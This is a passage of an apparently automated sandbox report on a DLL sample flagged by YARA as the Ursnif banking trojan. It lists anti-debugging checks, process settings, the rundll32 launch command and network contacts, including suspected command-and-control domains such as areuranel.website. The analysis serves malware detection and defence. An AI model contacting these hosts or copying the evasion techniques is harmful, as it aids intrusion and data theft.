                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbV source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbp source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbb source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb1 source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.579171572.00000000027E4000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594931191.0000000002810000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000E.00000003.586394801.0000000004A23000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600018161.0000000005674000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdbJ< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb~< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0321A3 push ecx; ret 0_2_6F0321B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F032150 push ecx; ret 0_2_6F032159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F06AB9A push ecx; ret 0_2_6F06ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303AF13 push ecx; ret 3_2_0303AF23
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303ABE0 push ecx; ret 3_2_0303ABE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F06AB9A push ecx; ret 3_2_6F06ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F06AB9A push ecx; ret 4_2_6F06ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293CA9C push 3C0293CCh; retf 5_2_0293CAA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C7A8 push eax; iretd 5_2_0293C7B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C954 push edx; retf 5_2_0293C955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293CEDA push esp; iretd 5_2_0293CF35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293CEF2 push esp; iretd 5_2_0293CF35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C8F7 pushad ; iretd 5_2_0293C8F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C8FC pushad ; iretd 5_2_0293C8FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C8E0 push eax; iretd 5_2_0293C8E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C7E4 push eax; iretd 5_2_0293C7E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031DE5 LoadLibraryA,GetProcAddress,0_2_6F031DE5

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.689258244.000000000509D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598927334.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.642989614.000000000519B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597021606.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596902134.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598779799.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.686530956.000000000325D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.641044169.000000000335B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.729588115.000000000315F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597111833.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599125921.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596646171.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598981939.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599214026.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599055381.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599169417.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597301011.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.733741499.0000000004F9F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596793912.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599525991.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5692, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.513458257.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492494632.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.752028518.0000000004C39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492791250.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.540888918.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.749793100.0000000002D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.610696920.0000000004576000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.629141860.000000000521E000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.630848345.00000000045E2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F076CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031DE5 LoadLibraryA,GetProcAddress,0_2_6F031DE5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F08C325 mov eax, dword ptr fs:[00000030h]0_2_6F08C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F08C325 mov eax, dword ptr fs:[00000030h]3_2_6F08C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F098861 mov eax, dword ptr fs:[00000030h]3_2_6F098861
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DDFDA mov eax, dword ptr fs:[00000030h]3_2_6F0DDFDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DDBB5 push dword ptr fs:[00000030h]3_2_6F0DDBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DDEAA mov eax, dword ptr fs:[00000030h]3_2_6F0DDEAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F08C325 mov eax, dword ptr fs:[00000030h]4_2_6F08C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F098861 mov eax, dword ptr fs:[00000030h]4_2_6F098861
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0DDFDA mov eax, dword ptr fs:[00000030h]4_2_6F0DDFDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0DDEAA mov eax, dword ptr fs:[00000030h]4_2_6F0DDEAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0DDBB5 push dword ptr fs:[00000030h]4_2_6F0DDBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F076CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F06B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6F06B316
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F076CB3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F06B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F06B316
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F076CB3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F06B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6F06B316

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.178.34 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.178.98 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6F090E4C
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6F069EB5
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F090429
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F09E448
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F09E344
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F09E3AD
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6F09EA21
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6F09E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F090E4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F069EB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F090429
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F09E448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F09E344
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F09E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6F09EA21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6F09E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6F09E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6F090E4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6F069EB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F090429
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F09E448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F09E344
